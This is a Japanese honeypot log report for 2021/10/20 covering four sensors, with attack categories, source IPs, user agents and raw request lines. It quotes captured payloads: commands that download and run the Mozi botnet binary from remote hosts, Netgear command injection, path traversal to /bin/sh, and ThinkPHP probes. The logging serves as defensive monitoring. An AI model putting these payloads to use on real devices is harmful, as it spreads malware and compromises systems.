2021/10/20 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ

ハニーポット(仮) 観測記録 2021/10/20分です。

特徴

共通

Apache HTTP Serverの脆弱性(CVE-2021-41773)を狙うアクセス
GPONルータの脆弱性を狙うアクセス
Liferay Portal JSON Web Serviceの脆弱性(CVE-2020-7961)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
/.envへのスキャン行為
Apache Solrへのスキャン行為
Laravelへのスキャン行為
WordPress Pluginへのスキャン行為

Location：JP

ZmEuによるスキャン行為
/.awsへのスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, Worldであるアクセス
を確認しました。

Location：US

NetGear製品の脆弱性を狙うアクセス
WordPressへのスキャン行為
UserAgentがHello, worldであるアクセス
を確認しました。

/shellに対する以下のアクセスを確認しました。

cd /tmp;
rm -rf *;
wget http[:]//117[.]198[.]172[.]229:48113/Mozi.a;
chmod 777 Mozi[.]a;
/tmp/Mozi.a jaws

Location：UK

Spring Bootの脆弱性を狙うアクセス
クラウド環境のメタデータ情報を狙うアクセス
Nmap Scripting Engineによるスキャン行為
UserAgentがHello, Worldであるアクセス
を確認しました。

Location：SG

NetGear製品の脆弱性を狙うアクセス
ZmEuによるスキャン行為
を確認しました。

他

アクセス数推移

JP：総アクセス数：92 (前日比：-64)
US：総アクセス数：82 (前日比：+9)
UK：総アクセス数：119 (前日比：-353)
SG：総アクセス数：56 (前日比：-28)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Location:JP

送信元IPアドレス一覧

件数	送信元IPアドレス	国
7	2.57.122.15	Romania
1	3.18.109.51	United States
1	4.17.224.131	United States
3	18.191.226.6	United States
3	18.229.140.65	United States
1	34.210.106.156	United States
1	35.240.165.170	United States
1	43.248.96.136	China
1	45.145.166.230	France
12	45.146.164.110	Russia
3	54.173.33.179	United States
2	80.82.78.39	United Kingdom
1	88.137.241.134	France
1	94.102.49.159	United Kingdom
1	107.189.28.85	United States
1	113.104.236.146	China
1	124.158.184.198	Indonesia
3	125.64.94.138	China
5	135.125.244.48	France
2	137.184.193.174	United States
1	139.162.145.250	Netherlands
1	143.244.140.138	United States
3	159.203.18.202	United States
4	161.35.212.57	United States
1	162.62.117.51	Singapore
4	162.221.192.26	United States
1	163.125.253.57	China
2	165.232.86.149	United States
2	185.254.31.134	Turkey
1	194.163.173.129	Germany
2	199.34.16.102	United States
1	209.17.96.98	United States
4	209.141.32.162	United States
1	209.141.41.12	United States
4	209.141.51.171	United States
2	209.141.54.186	United States
4	209.141.62.185	United States
1	213.164.204.146	Sweden
2	222.186.19.235	China

UserAgent一覧

件数	UserAgent
10	-
1	Go-http-client/1.1
1	Hello, World
1	Mozila/5.0
1	Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)
1	Mozilla/5.0
1	Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
6	Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0
1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
4	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
12	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1	Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.801.0 Safari/535.1
25	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
3	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36
1	Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.3 Safari/532.1
7	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
5	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1	Mozilla/5.0 (compatible; Baiduspider/2.0; +http[:]//www[.]baidu[.]com/search/spider.html)
6	SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0
4	ZmEu

リクエスト内容一覧

件数	Method	Request	Protocol
1		\x03
2		\x16\x03\x01
1		\x16\x03\x01\x01C\x01
1		\x16\x03\x01\x01\xfa\x01
1	GET	/%20-%20Copy.env	HTTP/1.1
1	GET	/%21.env	HTTP/1.1
1	GET	/.aws	HTTP/1.1
1	GET	/.aws/credentials	HTTP/1.1
35	GET	/.env	HTTP/1.1
1	GET	/.well-known/security.txt	HTTP/1.1
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/_ignition/execute-solution	HTTP/1.1
1	GET	/bag2	HTTP/1.1
1	GET	/boaform/admin/formLogin?username=admin&psd=admin	HTTP/1.0
1	GET	/config/app.php	HTTP/1.1
5	GET	/config/getuser?index=0	HTTP/1.1
1	GET	/console/	HTTP/1.1
1	GET	/corona/index.php	HTTP/1.1
2	GET	/favicon.ico	HTTP/1.1
1	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21	HTTP/1.1
2	GET	/phpMyAdmin/scripts/setup.php	HTTP/1.1
1	GET	/robots.txt	HTTP/1.1
1	GET	/sendgrid.env	HTTP/1.1
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
2	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
2	GET	/w00tw00t.at.blackhats.romanian.anti-sec:)	HTTP/1.1
1	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
2	GET	http[:]//fuwu[.]sogou[.]com/404/index.html	HTTP/1.1
1	GET	http[:]//wall[.]angelsword[.]cc/lixuan.php	HTTP/1.1
1	HEAD	/icons/.%%32%65/.%%32%65/apache2/icons/non-existant-image.png	HTTP/1.1
1	HEAD	/icons/.%%32%65/.%%32%65/apache2/icons/sphere1.png	HTTP/1.1
1	HEAD	/icons/.%2e/%2e%2e/apache2/icons/sphere1.png	HTTP/1.1
1	HEAD	/icons/sphere1.png	HTTP/1.1
1	OPTIONS	/	HTTP/1.0
1	POST	/Autodiscover/Autodiscover.xml	HTTP/1.1
1	POST	/GponForm/diag_Form?images/	HTTP/1.1
1	POST	/HNAP1/	HTTP/1.1
1	POST	/api/jsonws/invoke	HTTP/1.1
7	POST	/boaform/admin/formLogin	HTTP/1.1
1	POST	/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh	HTTP/1.1
1	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1

Location:US

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	23.129.64.172	United States
1	34.86.35.4	United States
18	34.215.156.89	United States
2	35.240.176.55	United States
3	45.61.146.242	United States
12	45.146.164.110	Russia
1	45.148.10.241	Romania
2	52.165.148.229	United States
2	80.82.78.39	United Kingdom
1	88.137.241.134	France
3	89.248.165.52	United Kingdom
1	117.198.172.229	India
1	119.189.200.70	China
2	125.64.94.136	China
3	135.125.217.54	France
1	137.184.202.162	United States
1	139.162.145.250	Netherlands
1	143.110.188.250	United States
4	154.86.16.143	Seychelles
1	159.223.20.32	United States
2	194.163.173.129	Germany
1	209.17.96.106	United States
1	209.17.97.34	United States
1	209.127.17.242	Canada
3	209.141.41.12	United States
6	209.141.51.171	United States
1	209.141.54.186	United States
3	209.141.62.185	United States
3	222.186.19.235	China

UserAgent一覧

件数	UserAgent
13	-
4	Go-http-client/1.1
1	Hello, world
2	Mozila/5.0
1	Mozilla / 5.0(Linux; U; Android 4.0.3; ko-kr; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
1	Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)
1	Mozilla/5.0
30	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
1	Mozilla/5.0 (Windows NT 6.0) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.3 Safari/534.24
1	Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
1	Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36
8	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
2	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36
7	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
6	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
2	Mozilla/5.0 (compatible; Baiduspider/2.0; +http[:]//www[.]baidu[.]com/search/spider.html)
1	python-requests/2.18.4

リクエスト内容一覧

件数	Method	Request	Protocol
2		-
7		\x16\x03\x01
1		\x16\x03\x01\x01\xfb\x01
1		\x16\x03\x01\x02
1	CONNECT	hotmail-com.olc[.]protection[.]outlook[.]com:25	HTTP/1.1
9	GET	/.env	HTTP/1.1
1	GET	/2018/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/2019/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
2	GET	/_ignition/execute-solution	HTTP/1.1
1	GET	/bag2	HTTP/1.1
1	GET	/blog/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/cms/wp-includes/wlwmanifest.xml	HTTP/1.1
6	GET	/config/getuser?index=0	HTTP/1.1
1	GET	/console/	HTTP/1.1
1	GET	/corona/index.php	HTTP/1.1
4	GET	/favicon.ico	HTTP/1.1
1	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21	HTTP/1.1
1	GET	/media/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/news/wp-includes/wlwmanifest.xml	HTTP/1.1
2	GET	/robots.txt	HTTP/1.1
1	GET	/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//119[.]189[.]200[.]70:39987/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1	HTTP/1.0
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+http[:]//117[.]198[.]172[.]229:48113/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws	HTTP/1.1
1	GET	/shop/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/site/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/sitemap.xml	HTTP/1.1
1	GET	/sito/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/test/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	GET	/web/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/website/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/wordpress/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
1	GET	/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/wp/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/wp1/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/wp2/wp-includes/wlwmanifest.xml	HTTP/1.1
1	GET	/xmlrpc.php?rsd	HTTP/1.1
1	GET	http[:]//example[.]com/	HTTP/1.1
2	GET	http[:]//fuwu[.]sogou[.]com/404/index.html	HTTP/1.1
1	POST	/Autodiscover/Autodiscover.xml	HTTP/1.1
2	POST	/HNAP1/	HTTP/1.1
1	POST	/admin	HTTP/1.1
1	POST	/api/jsonws/invoke	HTTP/1.1
7	POST	/boaform/admin/formLogin	HTTP/1.1
1	POST	/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh	HTTP/1.1
1	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	1.246.223.130	South Korea
1	4.16.142.230	United States
1	34.86.35.22	United States
3	45.61.146.242	United States
1	45.61.184.37	United States
12	45.146.164.110	Russia
1	45.148.10.241	Romania
1	45.201.206.80	Cambodia
1	107.189.13.26	United States
1	107.189.28.85	United States
65	132.145.60.63	United States
1	134.209.18.216	United States
1	139.162.145.250	Netherlands
1	143.198.180.97	United States
6	160.116.22.17	South Africa
1	162.62.117.51	Singapore
4	164.52.24.179	China
1	182.113.200.133	China
1	182.120.53.182	China
2	185.254.31.134	Turkey
1	194.163.173.129	Germany
1	205.185.113.41	United States
1	209.17.96.106	United States
1	209.141.36.13	United States
2	209.141.41.12	United States
4	209.141.51.171	United States
3	209.141.62.185	United States

UserAgent一覧

件数	UserAgent
15	-
1	Go-http-client/1.1
1	Hello, World
1	Mozila/5.0
1	Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)
1	Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30
12	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
2	Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36
2	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
3	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36
8	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
6	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
65	Mozilla/5.0 (compatible; Nmap Scripting Engine; https[:]//nmap[.]org/book/nse.html)
1	python-requests/2.18.4

リクエスト内容一覧

件数	Method	Request	Protocol
1		\x01\x00\x00\x00	\xbf\x02\x00\x88\x13\x00\x00\x87\x00\x00\x00NIMABIJIAN\x04\x03\x00\x00{\x99Caig\x9c\x03\xc7eB\xc5\t\xc1\x18a\x11\x1a\x91\x1f\x02\tcof\x91\xc0\x80sJ5\xd2\x80\xe6\x9a~\xb9\xc7\x83^\x96\xeeN\x16\x96\x96&\xe6\x03\xea\xbc\x81\x02=\xac\x10\xfa?7\x03\xc3\xdf\xf7\xe4\x98`p\xe6\x8d\xc1\xa9\x8d\xc6\x06\xdb\xaf\x91\xe7\x82s\xf7\x14H\xd4\xe1W\x9a\x93C\x9e]\xa4\x01#\x03#\x03]\x03c]CC\x05C\x03+S\x03b\xf4\x00\x00/\x9e\x16E\n
8		\x16\x03\x01
1		\x16\x03\x01\x01	\x01
1		\x16\x03\x01\x01C\x01
1		\x16\x03\x01\x01\xfc\x01
1	ENBL	/	HTTP/1.1
4	GET	/.env	HTTP/1.1
1	GET	/.git/HEAD	HTTP/1.1
1	GET	/.well-known/security.txt	HTTP/1.1
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/HNAP1	HTTP/1.1
2	GET	/_ignition/execute-solution	HTTP/1.1
1	GET	/admin/info/config	HTTP/1.1
1	GET	/api/spec.json	HTTP/1.1
1	GET	/bag2	HTTP/1.1
1	GET	/boaform/admin/formLogin?username=ec8&psd=ec8	HTTP/1.0
6	GET	/config/getuser?index=0	HTTP/1.1
1	GET	/console/	HTTP/1.1
1	GET	/console/css/%252E%252E%252Fconsole.portal	HTTP/1.1
1	GET	/console/css/%252e%252e%252fconsole.portal	HTTP/1.1
1	GET	/console/images/%252E%252E%252Fconsole.portal	HTTP/1.1
1	GET	/console/images/%252e%252e%252fconsole.portal	HTTP/1.1
2	GET	/favicon.ico	HTTP/1.1
1	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21	HTTP/1.1
1	GET	/nmaplowercheck1634616224	HTTP/1.1
1	GET	/opc/v1/identity	HTTP/1.1
1	GET	/opc/v1/instance	HTTP/1.1
2	GET	/robots.txt	HTTP/1.1
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/spec/api.json	HTTP/1.1
1	GET	/ui	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
1	GET	http[:]//example[.]com/	HTTP/1.1
1	HEAD	/	HTTP/1.0
1	HEAD	/actuator	HTTP/1.1
1	HEAD	/actuator/auditevents	HTTP/1.1
1	HEAD	/actuator/beans	HTTP/1.1
1	HEAD	/actuator/conditions	HTTP/1.1
1	HEAD	/actuator/configprops	HTTP/1.1
1	HEAD	/actuator/env	HTTP/1.1
1	HEAD	/actuator/health	HTTP/1.1
1	HEAD	/actuator/heapdump	HTTP/1.1
1	HEAD	/actuator/httptrace	HTTP/1.1
1	HEAD	/actuator/hystrix.stream	HTTP/1.1
1	HEAD	/actuator/info	HTTP/1.1
1	HEAD	/actuator/jolokia	HTTP/1.1
1	HEAD	/actuator/loggers	HTTP/1.1
1	HEAD	/actuator/mappings	HTTP/1.1
1	HEAD	/actuator/metrics	HTTP/1.1
1	HEAD	/actuator/scheduledtasks	HTTP/1.1
1	HEAD	/actuator/threaddump	HTTP/1.1
1	HEAD	/auditevents	HTTP/1.1
1	HEAD	/autoconfig	HTTP/1.1
1	HEAD	/beans	HTTP/1.1
1	HEAD	/cloudfoundryapplication	HTTP/1.1
1	HEAD	/configprops	HTTP/1.1
1	HEAD	/dump	HTTP/1.1
1	HEAD	/env	HTTP/1.1
1	HEAD	/health	HTTP/1.1
1	HEAD	/heapdump	HTTP/1.1
1	HEAD	/hystrix.stream	HTTP/1.1
1	HEAD	/info	HTTP/1.1
1	HEAD	/jolokia	HTTP/1.1
1	HEAD	/loggers	HTTP/1.1
1	HEAD	/mappings	HTTP/1.1
1	HEAD	/metrics	HTTP/1.1
1	HEAD	/threaddump	HTTP/1.1
1	HEAD	/trace	HTTP/1.1
11	OPTIONS	/	HTTP/1.1
1	POST	/Autodiscover/Autodiscover.xml	HTTP/1.1
1	POST	/GponForm/diag_Form?images/	HTTP/1.1
1	POST	/HNAP1/	HTTP/1.0
1	POST	/HNAP1/	HTTP/1.1
1	POST	/admin	HTTP/1.1
1	POST	/api/jsonws/invoke	HTTP/1.1
8	POST	/boaform/admin/formLogin	HTTP/1.1
1	POST	/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh	HTTP/1.1
1	POST	/sdk	HTTP/1.1
1	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
3	PROPFIND	/	HTTP/1.1

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	18.118.216.163	United States
1	23.129.64.178	United States
1	27.38.61.19	China
12	45.146.164.110	Russia
1	45.148.10.241	Romania
1	67.254.133.75	United States
2	80.82.78.39	United Kingdom
1	103.153.78.125	Vietnam
3	135.125.217.54	France
1	137.184.193.174	United States
1	137.184.202.162	United States
1	139.162.145.250	Netherlands
6	160.116.22.17	South Africa
6	163.172.168.251	United Kingdom
2	167.71.110.82	United States
1	167.94.138.59	United States
1	194.163.173.129	Germany
1	195.78.54.101	Lithuania
2	199.34.16.102	United States
2	209.141.32.162	United States
4	209.141.51.171	United States
1	209.141.54.186	United States
2	209.141.62.185	United States
2	222.186.19.235	China

UserAgent一覧

件数	UserAgent
8	-
1	Go-http-client/1.1
1	Mozila/5.0
1	Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)
1	Mozilla/5.0
1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
1	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1664.3 Safari/537.36
12	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
2	Mozilla/5.0 (Windows NT 6.0; rv:52.0.2) Gecko/20100101 Firefox/52.0.2
2	Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.67 Safari/537.36 OPR/56.0.3051.104
1	Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.2.152.0 Safari/525.19
1	Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1
9	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
3	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36
5	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
2	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
1	Mozilla/5.0 (compatible; Baiduspider/2.0; +http[:]//www[.]baidu[.]com/search/spider.html)
4	ZmEu

リクエスト内容一覧

件数	Method	Request	Protocol
1		\x01\x00\x00\x00	\xbf\x02\x00\x88\x13\x00\x00\x87\x00\x00\x00NIMABIJIAN\x04\x03\x00\x00{\x99Caig\x9c\x03\xc7eB\xc5\t\xc1\x18a\x11\x1a\x91\x1f\x02\tcof\x91\xc0\x80sJ5\xd2\x80\xe6\x9a~\xb9\xc7\x83^\x96\xeeN\x16\x96\x96&\xe6\x03\xea\xbc\x81\x02=\xac\x10\xfa?7\x03\xc3\xdf\xf7\xe4\x98`p\xe6\x8d\xc1\xa9\x8d\xc6\x06\xdb\xaf\x91\xe7\x82s\xf7\x14H\xd4\xe1W\x9a\x93C\x9e]\xa4\x01#\x03#\x03]\x03c]CC\x05C\x03+S\x03b\xf4\x00\x00/\x9e\x16E
4		\x16\x03\x01
2	CONNECT	www[.]bing[.]com:443	HTTP/1.1
9	GET	/.env	HTTP/1.1
1	GET	/.well-known/security.txt	HTTP/1.1
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/_ignition/execute-solution	HTTP/1.1
1	GET	/bag2	HTTP/1.1
2	GET	/config/getuser?index=0	HTTP/1.1
1	GET	/console/	HTTP/1.1
1	GET	/corona/index.php	HTTP/1.1
2	GET	/favicon.ico	HTTP/1.1
1	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21	HTTP/1.1
2	GET	/phpMyAdmin/scripts/setup.php	HTTP/1.1
1	GET	/robots.txt	HTTP/1.1
1	GET	/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1	HTTP/1.0
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
2	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
2	GET	/w00tw00t.at.blackhats.romanian.anti-sec:)	HTTP/1.1
1	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
1	GET	http[:]//example[.]com/	HTTP/1.1
2	GET	http[:]//fuwu[.]sogou[.]com/404/index.html	HTTP/1.1
2	GET	http[:]//www[.]bing[.]com/	HTTP/1.1
1	OPTIONS	/	HTTP/1.1
1	POST	/Autodiscover/Autodiscover.xml	HTTP/1.1
1	POST	/HNAP1/	HTTP/1.1
1	POST	/api/jsonws/invoke	HTTP/1.1
5	POST	/boaform/admin/formLogin	HTTP/1.1
1	POST	/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh	HTTP/1.1
1	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	POST	http[:]//jaymelevitz[.]fun/0cbdf2c7f5ff277051e70699cebc357ea6ef37c557ceeb305aa1654c2d2f3b19a270d59daf2c3b1ddb40ea6a98faa41305fe9d5f7ab00e42b231f1829c2106d8712dc293f61a14d0b4edfb6a035e97f75f16caea3ca7d75bb51318d3f70ac8f0	HTTP/1.1
1	POST	http[:]//maryblack[.]xyz/a109b622c151a0d1f19c157adfb6ed2f9b0573691e56963d7f3b9eb4254d56811a3e832e0e4008701a481360a39c4d167f569848cd02ef7c6856296f630a0ff07a040dc9dad35828705ab37776163b8772ed95d16e2a1522070a2aba54376851	HTTP/1.1